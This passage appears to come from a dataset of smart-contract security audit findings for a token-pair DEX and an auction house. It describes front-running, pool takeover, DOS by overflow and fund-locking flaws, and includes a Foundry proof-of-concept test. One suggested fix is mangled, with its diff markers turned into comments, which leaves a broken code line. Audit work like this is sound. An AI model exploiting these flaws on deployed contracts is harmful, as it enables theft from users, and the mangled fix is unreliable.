As a result, the bootstrap function is broken.\\nBased on this fact, an attacker can front run the `createPair()` function if he finds the `addLiquidity()` function in the mempool.чIt is recommended that the `GoatV1Factory.sol#.createPair()` function be called only from the `GoatRouterV1` contract.чThe bootstrap function of the protocol is broken and the initial LP must pay an amount of WETH equivalent to bootstrapEth.ч```\\n function _addLiquidity(\\n address token,\\n uint256 tokenDesired,\\n uint256 wethDesired,\\n uint256 tokenMin,\\n uint256 wethMin,\\n GoatTypes.InitParams memory initParams\\n ) internal returns (uint256, uint256, bool) {\\n GoatTypes.LocalVariables_AddLiquidity memory vars;\\n GoatV1Pair pair = GoatV1Pair(GoatV1Factory(FACTORY).getPool(token));\\n if (address(pair) == address(0)) {\\n // First time liquidity provider\\n pair = GoatV1Pair(GoatV1Factory(FACTORY).createPair(token, initParams));\\n vars.isNewPair = true;\\n }\\n\\n if (vars.isNewPair) {\\n// rest of codeSNIP\\n } else {\\n /**\\n * @dev This block is accessed after the presale period is over and the pool is converted to AMM\\n */\\n (uint256 wethReserve, uint256 tokenReserve) = pair.getReserves();\\n uint256 tokenAmountOptimal = GoatLibrary.quote(wethDesired, wethReserve, tokenReserve);\\n if (tokenAmountOptimal <= tokenDesired) {\\n if (tokenAmountOptimal < tokenMin) {\\n revert GoatErrors.InsufficientTokenAmount();\\n }\\n (vars.tokenAmount, vars.wethAmount) = (tokenAmountOptimal, wethDesired);\\n } else {\\n uint256 wethAmountOptimal = GoatLibrary.quote(tokenDesired, tokenReserve, wethReserve);\\n assert(wethAmountOptimal <= wethDesired);\\n if (wethAmountOptimal < wethMin) revert GoatErrors.InsufficientWethAmount();\\n (vars.tokenAmount, vars.wethAmount) = (tokenDesired, wethAmountOptimal);\\n }\\n }\\n return (vars.tokenAmount, vars.wethAmount, vars.isNewPair);\\n }\\n```\\n -No check for `initialEth` in `GoatV1Pair.takeOverPool()`.чmediumчGoatV1Pair.takeOverPool() only 
checks the amount of `token` for initialization, not `initialETH`.\\n```\\n function takeOverPool(GoatTypes.InitParams memory initParams) external {\\n if (_vestingUntil != _MAX_UINT32) {\\n revert GoatErrors.ActionNotAllowed();\\n }\\n\\n GoatTypes.InitialLPInfo memory initialLpInfo = _initialLPInfo;\\n\\n GoatTypes.LocalVariables_TakeOverPool memory localVars;\\n address to = msg.sender;\\n localVars.virtualEthOld = _virtualEth;\\n localVars.bootstrapEthOld = _bootstrapEth;\\n localVars.initialTokenMatchOld = _initialTokenMatch;\\n\\n (localVars.tokenAmountForPresaleOld, localVars.tokenAmountForAmmOld) = _tokenAmountsForLiquidityBootstrap(\\n localVars.virtualEthOld,\\n localVars.bootstrapEthOld,\\n initialLpInfo.initialWethAdded,\\n localVars.initialTokenMatchOld\\n );\\n\\n // new token amount for bootstrap if no swaps would have occured\\n (localVars.tokenAmountForPresaleNew, localVars.tokenAmountForAmmNew) = _tokenAmountsForLiquidityBootstrap(\\n initParams.virtualEth, initParams.bootstrapEth, initParams.initialEth, initParams.initialTokenMatch\\n );\\n\\n // team needs to add min 10% more tokens than the initial lp to take over\\n localVars.minTokenNeeded =\\n ((localVars.tokenAmountForPresaleOld + localVars.tokenAmountForAmmOld) * 11000) / 10000;\\n\\n481 if ((localVars.tokenAmountForAmmNew + localVars.tokenAmountForPresaleNew) < localVars.minTokenNeeded) {\\n revert GoatErrors.InsufficientTakeoverTokenAmount();\\n }\\n\\n localVars.reserveEth = _reserveEth;\\n\\n // Actual token amounts needed if the reserves have updated after initial lp mint\\n (localVars.tokenAmountForPresaleNew, localVars.tokenAmountForAmmNew) = _tokenAmountsForLiquidityBootstrap(\\n initParams.virtualEth, initParams.bootstrapEth, localVars.reserveEth, initParams.initialTokenMatch\\n );\\n localVars.reserveToken = _reserveToken;\\n\\n // amount of tokens transferred by the new team\\n uint256 tokenAmountIn = IERC20(_token).balanceOf(address(this)) - localVars.reserveToken;\\n\\n if 
(\\n tokenAmountIn\\n < (\\n localVars.tokenAmountForPresaleOld + localVars.tokenAmountForAmmOld - localVars.reserveToken\\n + localVars.tokenAmountForPresaleNew + localVars.tokenAmountForAmmNew\\n )\\n ) {\\n revert GoatErrors.IncorrectTokenAmount();\\n }\\n\\n localVars.pendingLiquidityFees = _pendingLiquidityFees;\\n localVars.pendingProtocolFees = _pendingProtocolFees;\\n\\n // amount of weth transferred by the new team\\n uint256 wethAmountIn = IERC20(_weth).balanceOf(address(this)) - localVars.reserveEth\\n - localVars.pendingLiquidityFees - localVars.pendingProtocolFees;\\n\\n if (wethAmountIn < localVars.reserveEth) {\\n revert GoatErrors.IncorrectWethAmount();\\n }\\n\\n _handleTakeoverTransfers(\\n IERC20(_weth), IERC20(_token), initialLpInfo.liquidityProvider, localVars.reserveEth, localVars.reserveToken\\n );\\n\\n uint256 lpBalance = balanceOf(initialLpInfo.liquidityProvider);\\n _burn(initialLpInfo.liquidityProvider, lpBalance);\\n\\n // new lp balance\\n lpBalance = Math.sqrt(uint256(initParams.virtualEth) * initParams.initialTokenMatch) - MINIMUM_LIQUIDITY;\\n _mint(to, lpBalance);\\n\\n _updateStateAfterTakeover(\\n initParams.virtualEth,\\n initParams.bootstrapEth,\\n initParams.initialTokenMatch,\\n wethAmountIn,\\n tokenAmountIn,\\n lpBalance,\\n to,\\n initParams.initialEth\\n );\\n }\\n```\\n\\nAlthough there is a check for the amount of `token` at L481, if the caller sets `initParams.initialEth` to 0, it can easily pass L481 because a smaller `initParams.initialEth` results in a larger `localVars.tokenAmountForAmmNew + localVars.tokenAmountForPresaleNew`. 
This is due to the fact that the former initial provider's `initialEth` does not have any effect in preventing takeovers.чThere should be a check for `initParams.initialEth`.чA pool could be unfairly taken over because the former initial provider's `initialEth` does not have any effect in preventing takeovers.ч```\\n function takeOverPool(GoatTypes.InitParams memory initParams) external {\\n if (_vestingUntil != _MAX_UINT32) {\\n revert GoatErrors.ActionNotAllowed();\\n }\\n\\n GoatTypes.InitialLPInfo memory initialLpInfo = _initialLPInfo;\\n\\n GoatTypes.LocalVariables_TakeOverPool memory localVars;\\n address to = msg.sender;\\n localVars.virtualEthOld = _virtualEth;\\n localVars.bootstrapEthOld = _bootstrapEth;\\n localVars.initialTokenMatchOld = _initialTokenMatch;\\n\\n (localVars.tokenAmountForPresaleOld, localVars.tokenAmountForAmmOld) = _tokenAmountsForLiquidityBootstrap(\\n localVars.virtualEthOld,\\n localVars.bootstrapEthOld,\\n initialLpInfo.initialWethAdded,\\n localVars.initialTokenMatchOld\\n );\\n\\n // new token amount for bootstrap if no swaps would have occured\\n (localVars.tokenAmountForPresaleNew, localVars.tokenAmountForAmmNew) = _tokenAmountsForLiquidityBootstrap(\\n initParams.virtualEth, initParams.bootstrapEth, initParams.initialEth, initParams.initialTokenMatch\\n );\\n\\n // team needs to add min 10% more tokens than the initial lp to take over\\n localVars.minTokenNeeded =\\n ((localVars.tokenAmountForPresaleOld + localVars.tokenAmountForAmmOld) * 11000) / 10000;\\n\\n481 if ((localVars.tokenAmountForAmmNew + localVars.tokenAmountForPresaleNew) < localVars.minTokenNeeded) {\\n revert GoatErrors.InsufficientTakeoverTokenAmount();\\n }\\n\\n localVars.reserveEth = _reserveEth;\\n\\n // Actual token amounts needed if the reserves have updated after initial lp mint\\n (localVars.tokenAmountForPresaleNew, localVars.tokenAmountForAmmNew) = _tokenAmountsForLiquidityBootstrap(\\n initParams.virtualEth, initParams.bootstrapEth, 
localVars.reserveEth, initParams.initialTokenMatch\\n );\\n localVars.reserveToken = _reserveToken;\\n\\n // amount of tokens transferred by the new team\\n uint256 tokenAmountIn = IERC20(_token).balanceOf(address(this)) - localVars.reserveToken;\\n\\n if (\\n tokenAmountIn\\n < (\\n localVars.tokenAmountForPresaleOld + localVars.tokenAmountForAmmOld - localVars.reserveToken\\n + localVars.tokenAmountForPresaleNew + localVars.tokenAmountForAmmNew\\n )\\n ) {\\n revert GoatErrors.IncorrectTokenAmount();\\n }\\n\\n localVars.pendingLiquidityFees = _pendingLiquidityFees;\\n localVars.pendingProtocolFees = _pendingProtocolFees;\\n\\n // amount of weth transferred by the new team\\n uint256 wethAmountIn = IERC20(_weth).balanceOf(address(this)) - localVars.reserveEth\\n - localVars.pendingLiquidityFees - localVars.pendingProtocolFees;\\n\\n if (wethAmountIn < localVars.reserveEth) {\\n revert GoatErrors.IncorrectWethAmount();\\n }\\n\\n _handleTakeoverTransfers(\\n IERC20(_weth), IERC20(_token), initialLpInfo.liquidityProvider, localVars.reserveEth, localVars.reserveToken\\n );\\n\\n uint256 lpBalance = balanceOf(initialLpInfo.liquidityProvider);\\n _burn(initialLpInfo.liquidityProvider, lpBalance);\\n\\n // new lp balance\\n lpBalance = Math.sqrt(uint256(initParams.virtualEth) * initParams.initialTokenMatch) - MINIMUM_LIQUIDITY;\\n _mint(to, lpBalance);\\n\\n _updateStateAfterTakeover(\\n initParams.virtualEth,\\n initParams.bootstrapEth,\\n initParams.initialTokenMatch,\\n wethAmountIn,\\n tokenAmountIn,\\n lpBalance,\\n to,\\n initParams.initialEth\\n );\\n }\\n```\\n -Legitimate pools can be taken over and the penalty is not fair.чmediumчIn GoatV1Pair.takeOverPool(), a malicious user can take over pool from a legitimate user, because the mechanism for identifying is incorrect. And the penalty mechanism is not fair.\\nGoatV1Pair.takeOverPool() function exists to avoid grief, because only one pool can be created for each token. 
Doc says \"They can then lower the amount of virtual Ether or Ether to be raised, but not make it higher.\" about GoatV1Pair.takeOverPool(). However, there is no checking for the amount of virtual Ether. This made it possible that legitimate pools can be taken over by malicious users.\\nL481 and L496 checks the amount of tokens, but there is no check for virtual Ether or Ether to be raised. So, a malicious user can take over a legitimate pool without any cost. He can remove his cost by increasing the amount of virtual Ether or reserved Ether. Paying +10 percent token can do nothing with it. Furthermore, the old liquidity provider should pay 5% penalty. This is very unfair. Generally, a malicious user have no Ether reserved. So, it is only harmful to legitimate users.\\n```\\n function takeOverPool(GoatTypes.InitParams memory initParams) external {\\n if (_vestingUntil != _MAX_UINT32) {\\n revert GoatErrors.ActionNotAllowed();\\n }\\n\\n GoatTypes.InitialLPInfo memory initialLpInfo = _initialLPInfo;\\n\\n GoatTypes.LocalVariables_TakeOverPool memory localVars;\\n address to = msg.sender;\\n localVars.virtualEthOld = _virtualEth;\\n localVars.bootstrapEthOld = _bootstrapEth;\\n localVars.initialTokenMatchOld = _initialTokenMatch;\\n\\n (localVars.tokenAmountForPresaleOld, localVars.tokenAmountForAmmOld) = _tokenAmountsForLiquidityBootstrap(\\n localVars.virtualEthOld,\\n localVars.bootstrapEthOld,\\n initialLpInfo.initialWethAdded,\\n localVars.initialTokenMatchOld\\n );\\n\\n // new token amount for bootstrap if no swaps would have occured\\n (localVars.tokenAmountForPresaleNew, localVars.tokenAmountForAmmNew) = _tokenAmountsForLiquidityBootstrap(\\n initParams.virtualEth, initParams.bootstrapEth, initParams.initialEth, initParams.initialTokenMatch\\n );\\n\\n // team needs to add min 10% more tokens than the initial lp to take over\\n localVars.minTokenNeeded =\\n ((localVars.tokenAmountForPresaleOld + localVars.tokenAmountForAmmOld) * 11000) / 10000;\\n\\n481 if 
((localVars.tokenAmountForAmmNew + localVars.tokenAmountForPresaleNew) < localVars.minTokenNeeded) {\\n revert GoatErrors.InsufficientTakeoverTokenAmount();\\n }\\n\\n localVars.reserveEth = _reserveEth;\\n\\n // Actual token amounts needed if the reserves have updated after initial lp mint\\n (localVars.tokenAmountForPresaleNew, localVars.tokenAmountForAmmNew) = _tokenAmountsForLiquidityBootstrap(\\n initParams.virtualEth, initParams.bootstrapEth, localVars.reserveEth, initParams.initialTokenMatch\\n );\\n localVars.reserveToken = _reserveToken;\\n\\n // amount of tokens transferred by the new team\\n uint256 tokenAmountIn = IERC20(_token).balanceOf(address(this)) - localVars.reserveToken;\\n\\n if (\\n496 tokenAmountIn\\n497 < (\\n498 localVars.tokenAmountForPresaleOld + localVars.tokenAmountForAmmOld - localVars.reserveToken\\n499 + localVars.tokenAmountForPresaleNew + localVars.tokenAmountForAmmNew\\n500 )\\n ) {\\n revert GoatErrors.IncorrectTokenAmount();\\n }\\n\\n localVars.pendingLiquidityFees = _pendingLiquidityFees;\\n localVars.pendingProtocolFees = _pendingProtocolFees;\\n\\n // amount of weth transferred by the new team\\n uint256 wethAmountIn = IERC20(_weth).balanceOf(address(this)) - localVars.reserveEth\\n - localVars.pendingLiquidityFees - localVars.pendingProtocolFees;\\n\\n if (wethAmountIn < localVars.reserveEth) {\\n revert GoatErrors.IncorrectWethAmount();\\n }\\n\\n _handleTakeoverTransfers(\\n IERC20(_weth), IERC20(_token), initialLpInfo.liquidityProvider, localVars.reserveEth, localVars.reserveToken\\n );\\n\\n uint256 lpBalance = balanceOf(initialLpInfo.liquidityProvider);\\n _burn(initialLpInfo.liquidityProvider, lpBalance);\\n\\n // new lp balance\\n lpBalance = Math.sqrt(uint256(initParams.virtualEth) * initParams.initialTokenMatch) - MINIMUM_LIQUIDITY;\\n _mint(to, lpBalance);\\n\\n _updateStateAfterTakeover(\\n initParams.virtualEth,\\n initParams.bootstrapEth,\\n initParams.initialTokenMatch,\\n wethAmountIn,\\n tokenAmountIn,\\n 
lpBalance,\\n to,\\n initParams.initialEth\\n );\\n }\\n```\\nчI think that the mechanism for identifying should be improved.чLegitimate pools can be taken over unfairly.ч```\\n function takeOverPool(GoatTypes.InitParams memory initParams) external {\\n if (_vestingUntil != _MAX_UINT32) {\\n revert GoatErrors.ActionNotAllowed();\\n }\\n\\n GoatTypes.InitialLPInfo memory initialLpInfo = _initialLPInfo;\\n\\n GoatTypes.LocalVariables_TakeOverPool memory localVars;\\n address to = msg.sender;\\n localVars.virtualEthOld = _virtualEth;\\n localVars.bootstrapEthOld = _bootstrapEth;\\n localVars.initialTokenMatchOld = _initialTokenMatch;\\n\\n (localVars.tokenAmountForPresaleOld, localVars.tokenAmountForAmmOld) = _tokenAmountsForLiquidityBootstrap(\\n localVars.virtualEthOld,\\n localVars.bootstrapEthOld,\\n initialLpInfo.initialWethAdded,\\n localVars.initialTokenMatchOld\\n );\\n\\n // new token amount for bootstrap if no swaps would have occured\\n (localVars.tokenAmountForPresaleNew, localVars.tokenAmountForAmmNew) = _tokenAmountsForLiquidityBootstrap(\\n initParams.virtualEth, initParams.bootstrapEth, initParams.initialEth, initParams.initialTokenMatch\\n );\\n\\n // team needs to add min 10% more tokens than the initial lp to take over\\n localVars.minTokenNeeded =\\n ((localVars.tokenAmountForPresaleOld + localVars.tokenAmountForAmmOld) * 11000) / 10000;\\n\\n481 if ((localVars.tokenAmountForAmmNew + localVars.tokenAmountForPresaleNew) < localVars.minTokenNeeded) {\\n revert GoatErrors.InsufficientTakeoverTokenAmount();\\n }\\n\\n localVars.reserveEth = _reserveEth;\\n\\n // Actual token amounts needed if the reserves have updated after initial lp mint\\n (localVars.tokenAmountForPresaleNew, localVars.tokenAmountForAmmNew) = _tokenAmountsForLiquidityBootstrap(\\n initParams.virtualEth, initParams.bootstrapEth, localVars.reserveEth, initParams.initialTokenMatch\\n );\\n localVars.reserveToken = _reserveToken;\\n\\n // amount of tokens transferred by the new team\\n 
uint256 tokenAmountIn = IERC20(_token).balanceOf(address(this)) - localVars.reserveToken;\\n\\n if (\\n496 tokenAmountIn\\n497 < (\\n498 localVars.tokenAmountForPresaleOld + localVars.tokenAmountForAmmOld - localVars.reserveToken\\n499 + localVars.tokenAmountForPresaleNew + localVars.tokenAmountForAmmNew\\n500 )\\n ) {\\n revert GoatErrors.IncorrectTokenAmount();\\n }\\n\\n localVars.pendingLiquidityFees = _pendingLiquidityFees;\\n localVars.pendingProtocolFees = _pendingProtocolFees;\\n\\n // amount of weth transferred by the new team\\n uint256 wethAmountIn = IERC20(_weth).balanceOf(address(this)) - localVars.reserveEth\\n - localVars.pendingLiquidityFees - localVars.pendingProtocolFees;\\n\\n if (wethAmountIn < localVars.reserveEth) {\\n revert GoatErrors.IncorrectWethAmount();\\n }\\n\\n _handleTakeoverTransfers(\\n IERC20(_weth), IERC20(_token), initialLpInfo.liquidityProvider, localVars.reserveEth, localVars.reserveToken\\n );\\n\\n uint256 lpBalance = balanceOf(initialLpInfo.liquidityProvider);\\n _burn(initialLpInfo.liquidityProvider, lpBalance);\\n\\n // new lp balance\\n lpBalance = Math.sqrt(uint256(initParams.virtualEth) * initParams.initialTokenMatch) - MINIMUM_LIQUIDITY;\\n _mint(to, lpBalance);\\n\\n _updateStateAfterTakeover(\\n initParams.virtualEth,\\n initParams.bootstrapEth,\\n initParams.initialTokenMatch,\\n wethAmountIn,\\n tokenAmountIn,\\n lpBalance,\\n to,\\n initParams.initialEth\\n );\\n }\\n```\\n -The router is not compatible with fee on transfers tokensчmediumчThe router is not compatible with fee on transfers tokens.\\nLet's take as example the removeLiquidity function:\\n```\\naddress pair = GoatV1Factory(FACTORY).getPool(token);\\n\\nIERC20(pair).safeTransferFrom(msg.sender, pair, liquidity); //-> 1. Transfers liquidity tokens to the pair\\n(amountWeth, amountToken) = GoatV1Pair(pair).burn(to); //-> 2. Burns the liquidity tokens and sends WETH and TOKEN to the recipient\\nif (amountWeth < wethMin) { //-> 3. 
Ensures enough WETH has been transferred\\n revert GoatErrors.InsufficientWethAmount();\\n}\\nif (amountToken < tokenMin) { //4. Ensures enough TOKEN has been transferred\\n revert GoatErrors.InsufficientTokenAmount();\\n}\\n```\\n\\nIt does the following:\\nTransfers liquidity tokens `to` the pair.\\nBurns the liquidity tokens and sends WETH and TOKEN `to` the recipient `to`.\\nEnsures enough WETH has been transferred.\\nEnsures enough TOKEN has been transferred.\\nAt point `4` the router doesn't account for the fee paid to transfer TOKEN. The recipient didn't actually receive `amountToken`, but slightly less because a fee has been charged.\\nAnother interesting example is the removeLiquidityETH which first burns the liquidity and transfers the tokens to the router itself, and then from the router the tokens are transferred to the recipient. This will charge double the fees.\\nThis is just two examples to highlight the fact that these kind of tokens are not supported, but the other functions in the router have similar issues that can cause all sorts of trouble including reverts and loss of funds.чAdd functionality to the router to support fee on transfer tokens, a good example of where this is correctly implememented is the Uniswap Router02.чThe router is not compatible with fee on transfers tokens.ч```\\naddress pair = GoatV1Factory(FACTORY).getPool(token);\\n\\nIERC20(pair).safeTransferFrom(msg.sender, pair, liquidity); //-> 1. Transfers liquidity tokens to the pair\\n(amountWeth, amountToken) = GoatV1Pair(pair).burn(to); //-> 2. Burns the liquidity tokens and sends WETH and TOKEN to the recipient\\nif (amountWeth < wethMin) { //-> 3. Ensures enough WETH has been transferred\\n revert GoatErrors.InsufficientWethAmount();\\n}\\nif (amountToken < tokenMin) { //4. 
Ensures enough TOKEN has been transferred\\n revert GoatErrors.InsufficientTokenAmount();\\n}\\n```\\n -It's possible to create pairs that cannot be taken overчmediumчIt's possible to create pairs that cannot be taken over and DOS a pair forever.\\nA pair is created by calling createPair() which takes the initial parameters of the pair as inputs but the initial parameters are never verified, which makes it possible for an attacker to create a token pair that's impossible to recover via takeOverPool().\\nThere are more ways to create a pair that cannot be taken over, a simple example is to set all of the initial parameters to the maximum possible value:\\n```\\nuint112 virtualEth = type(uint112).max;\\nuint112 bootstrapEth = type(uint112).max;\\nuint112 initialEth = type(uint112).max;\\nuint112 initialTokenMatch = type(uint112).max;\\n```\\n\\nThis will make takeOverPool() revert for overflow on the internal call to _tokenAmountsForLiquidityBootstrap:\\n```\\nuint256 k = virtualEth * initialTokenMatch;\\n tokenAmtForAmm = (k * bootstrapEth) / (totalEth * totalEth);\\n```\\n\\nHere `virtualEth`, `initialTokenMatch` and `bootstrapEth` are all set to `type(uint112).max`. The multiplication `virtualEth` * `initialTokenMatch` * `bootstrapEth` performed to calculate `tokenAmtForAmm` will revert for overflow because `2^112 * 2^112 * 2^112 = 2^336` which is bigger than `2^256`.чValidate a pair's initial parameters and mint liquidity on pool creation.чCreation of new pairs can be DOSed forever.ч```\\nuint112 virtualEth = type(uint112).max;\\nuint112 bootstrapEth = type(uint112).max;\\nuint112 initialEth = type(uint112).max;\\nuint112 initialTokenMatch = type(uint112).max;\\n```\\n -[M-1]чhighчSeller's funds may remain locked in the protocol, because of revert on 0 transfer tokens. 
In the README.md file is stated that the protocol uses every token with ERC20 Metadata and decimals between 6-18, which includes some revert on 0 transfer tokens, so this should be considered as valid issue!\\nin the `AuctionHouse::claimProceeds()` function there is the following block of code:\\n```\\n uint96 prefundingRefund = routing.funding + payoutSent_ - sold_;\\n unchecked {\\n routing.funding -= prefundingRefund;\\n }\\n Transfer.transfer(\\n routing.baseToken,\\n _getAddressGivenCallbackBaseTokenFlag(routing.callbacks, routing.seller),\\n prefundingRefund,\\n false\\n );\\n```\\n\\nSince the batch auctions must be prefunded so `routing.funding` shouldn't be zero unless all the tokens were sent in settle, in which case `payoutSent` will equal `sold_`. From this we make the conclusion that it is possible for `prefundingRefund` to be equal to 0. This means if the `routing.baseToken` is a revert on 0 transfer token the seller will never be able to get the `quoteToken` he should get from the auction.чCheck if the `prefundingRefund > 0` like this:\\n```\\n function claimProceeds(\\n uint96 lotId_,\\n bytes calldata callbackData_\\n ) external override nonReentrant {\\n // Validation\\n _isLotValid(lotId_);\\n\\n // Call auction module to validate and update data\\n (uint96 purchased_, uint96 sold_, uint96 payoutSent_) =\\n _getModuleForId(lotId_).claimProceeds(lotId_);\\n\\n // Load data for the lot\\n Routing storage routing = lotRouting[lotId_];\\n\\n // Calculate the referrer and protocol fees for the amount in\\n // Fees are not allocated until the user claims their payout so that we don't have to iterate through them here\\n // If a referrer is not set, that portion of the fee defaults to the protocol\\n uint96 totalInLessFees;\\n {\\n (, uint96 toProtocol) = calculateQuoteFees(\\n lotFees[lotId_].protocolFee, lotFees[lotId_].referrerFee, false, purchased_\\n );\\n unchecked {\\n totalInLessFees = purchased_ - toProtocol;\\n }\\n }\\n\\n // Send payment in 
bulk to the address dictated by the callbacks address\\n // If the callbacks contract is configured to receive quote tokens, send the quote tokens to the callbacks contract and call the onClaimProceeds callback\\n // If not, send the quote tokens to the seller and call the onClaimProceeds callback\\n _sendPayment(routing.seller, totalInLessFees, routing.quoteToken, routing.callbacks);\\n\\n // Refund any unused capacity and curator fees to the address dictated by the callbacks address\\n // By this stage, a partial payout (if applicable) and curator fees have been paid, leaving only the payout amount (`totalOut`) remaining.\\n uint96 prefundingRefund = routing.funding // Add the line below\\n payoutSent_ - sold_;\\n// Add the line below\\n// Add the line below\\n if(prefundingRefund > 0) { \\n unchecked {\\n routing.funding -= prefundingRefund;\\n }\\n Transfer.transfer(\\n routing.baseToken,\\n _getAddressGivenCallbackBaseTokenFlag(routing.callbacks, routing.seller),\\n prefundingRefund,\\n false\\n );\\n// Add the line below\\n// Add the line below\\n }\\n \\n\\n // Call the onClaimProceeds callback\\n Callbacks.onClaimProceeds(\\n routing.callbacks, lotId_, totalInLessFees, prefundingRefund, callbackData_\\n );\\n }\\n```\\nчThe seller's funds remain locked in the system and he will never be able to get them back.ч```\\n uint96 prefundingRefund = routing.funding + payoutSent_ - sold_;\\n unchecked {\\n routing.funding -= prefundingRefund;\\n }\\n Transfer.transfer(\\n routing.baseToken,\\n _getAddressGivenCallbackBaseTokenFlag(routing.callbacks, routing.seller),\\n prefundingRefund,\\n false\\n );\\n```\\n -Module's gas yield can never be claimed and all yield will be lostчhighчModule's gas yield can never be claimed\\nThe protocol is meant to be deployed on blast, meaning that the gas and ether balance accrue yield.\\nBy default these yield settings for both ETH and GAS yields are set to VOID as default, meaning that unless we configure the yield mode to 
claimable, we will be unable to receive the yield. The protocol never sets gas to claimable for the modules, and the governor of the contract is the auction house, the auction house also does not implement any function to set the modules gas yield to claimable.\\n```\\n constructor(address auctionHouse_) LinearVesting(auctionHouse_) BlastGas(auctionHouse_) {}\\n```\\n\\nThe constructor of both BlastLinearVesting and BlastEMPAM set the auction house here `BlastGas(auctionHouse_)` if we look at this contract we can observe the above.\\nBlastGas.sol\\n```\\n    constructor(address parent_) {\\n        // Configure governor to claim gas fees\\n        IBlast(0x4300000000000000000000000000000000000002).configureGovernor(parent_);\\n    }\\n```\\n\\nAs we can see above, the governor is set in constructor, but we never set gas to claimable. Gas yield mode will be in its default mode which is VOID, the modules will not accrue gas yields. Since these modules never set gas yield mode to claimable, the auction house cannot claim any gas yield for either of the contracts. 
Additionally the auction house includes no function to configure yield mode, the auction house contract only has a function to claim the gas yield but this will revert since the yield mode for these module contracts will be VOID.чchange the following in BlastGas contract, this will set the gas yield of the modules to claimable in the constructor, allowing the auction house to claim gas yield.\\n```\\ninterface IBlast {\\n  function configureGovernor(address governor_) external;\\n  function configureClaimableGas() external; \\n}\\n\\nabstract contract BlastGas {\\n    // ========== CONSTRUCTOR ========== //\\n\\n    constructor(address parent_) {\\n        // Configure governor to claim gas fees\\n        IBlast(0x4300000000000000000000000000000000000002).configureClaimableGas();\\n        IBlast(0x4300000000000000000000000000000000000002).configureGovernor(parent_);\\n    }\\n}\\n```\\nчGas yields will never accrue and the yield will forever be lostч```\\n constructor(address auctionHouse_) LinearVesting(auctionHouse_) BlastGas(auctionHouse_) {}\\n```\\n -Auction creators have the ability to lock bidders' funds.чhighч`Auction creators` have the ability to cancel an `auction` before it starts. However, once the `auction` begins, they should not be allowed to cancel it. During the `auction`, `bidders` can place `bids` and send `quote` tokens to the `auction` house. After the `auction` concludes, `bidders` can either receive `base` tokens or retrieve their `quote` tokens. Unfortunately, batch `auction` creators can cancel an `auction` when it ends. This means that `auction` creators can cancel their `auctions` if they anticipate `losses`. This should not be allowed. 
The significant risk is that `bidders' funds` could become locked in the `auction` house.\\n`Auction creators` can not cancel an `auction` once it concludes.\\n```\\nfunction cancelAuction(uint96 lotId_) external override onlyInternal {\\n _revertIfLotConcluded(lotId_);\\n}\\n```\\n\\nThey also can not cancel it while it is active.\\n```\\nfunction _cancelAuction(uint96 lotId_) internal override {\\n _revertIfLotActive(lotId_);\\n\\n auctionData[lotId_].status = Auction.Status.Claimed;\\n}\\n```\\n\\nWhen the `block.timestamp` aligns with the `conclusion` time of the `auction`, we can bypass these checks.\\n```\\nfunction _revertIfLotConcluded(uint96 lotId_) internal view virtual {\\n if (lotData[lotId_].conclusion < uint48(block.timestamp)) {\\n revert Auction_MarketNotActive(lotId_);\\n }\\n\\n if (lotData[lotId_].capacity == 0) revert Auction_MarketNotActive(lotId_);\\n}\\nfunction _revertIfLotActive(uint96 lotId_) internal view override {\\n if (\\n auctionData[lotId_].status == Auction.Status.Created\\n && lotData[lotId_].start <= block.timestamp\\n && lotData[lotId_].conclusion > block.timestamp\\n ) revert Auction_WrongState(lotId_);\\n}\\n```\\n\\nSo `Auction creators` can cancel an `auction` when it concludes. Then the `capacity` becomes `0` and the `auction` status transitions to `Claimed`.\\n`Bidders` can not `refund` their `bids`.\\n```\\nfunction refundBid(\\n uint96 lotId_,\\n uint64 bidId_,\\n address caller_\\n) external override onlyInternal returns (uint96 refund) {\\n _revertIfLotConcluded(lotId_);\\n}\\n function _revertIfLotConcluded(uint96 lotId_) internal view virtual {\\n if (lotData[lotId_].capacity == 0) revert Auction_MarketNotActive(lotId_);\\n}\\n```\\n\\nThe only way for `bidders` to reclaim their tokens is by calling the `claimBids` function. 
However, `bidders` can only claim `bids` when the `auction status` is `Settled`.\\n```\\nfunction claimBids(\\n uint96 lotId_,\\n uint64[] calldata bidIds_\\n) {\\n _revertIfLotNotSettled(lotId_);\\n}\\n```\\n\\nTo `settle` the `auction`, the `auction` status should be `Decrypted`. This requires submitting the `private key`. The `auction` creator can not submit the `private key` or submit it without decrypting any `bids` by calling `submitPrivateKey(lotId, privateKey, 0)`. Then nobody can decrypt the `bids` using the `decryptAndSortBids` function which always reverts.\\n```\\nfunction decryptAndSortBids(uint96 lotId_, uint64 num_) external {\\n if (\\n auctionData[lotId_].status != Auction.Status.Created // @audit, here\\n || auctionData[lotId_].privateKey == 0\\n ) {\\n revert Auction_WrongState(lotId_);\\n }\\n\\n _decryptAndSortBids(lotId_, num_);\\n}\\n```\\n\\nAs a result, the `auction status` remains unchanged, preventing it from transitioning to `Settled`. This leaves the `bidders'` `quote` tokens locked in the `auction house`.\\nPlease add below test to the `test/modules/Auction/cancel.t.sol`.\\n```\\nfunction test_cancel() external whenLotIsCreated {\\n Auction.Lot memory lot = _mockAuctionModule.getLot(_lotId);\\n\\n console2.log(\"lot.conclusion before ==> \", lot.conclusion);\\n console2.log(\"block.timestamp before ==> \", block.timestamp);\\n console2.log(\"isLive ==> \", _mockAuctionModule.isLive(_lotId));\\n\\n vm.warp(lot.conclusion - block.timestamp + 1);\\n console2.log(\"lot.conclusion after ==> \", lot.conclusion);\\n console2.log(\"block.timestamp after ==> \", block.timestamp);\\n console2.log(\"isLive ==> \", _mockAuctionModule.isLive(_lotId));\\n\\n vm.prank(address(_auctionHouse));\\n _mockAuctionModule.cancelAuction(_lotId);\\n}\\n```\\n\\nThe log is\\n```\\nlot.conclusion before ==> 86401\\nblock.timestamp before ==> 1\\nisLive ==> true\\nlot.conclusion after ==> 86401\\nblock.timestamp after ==> 86401\\nisLive ==> 
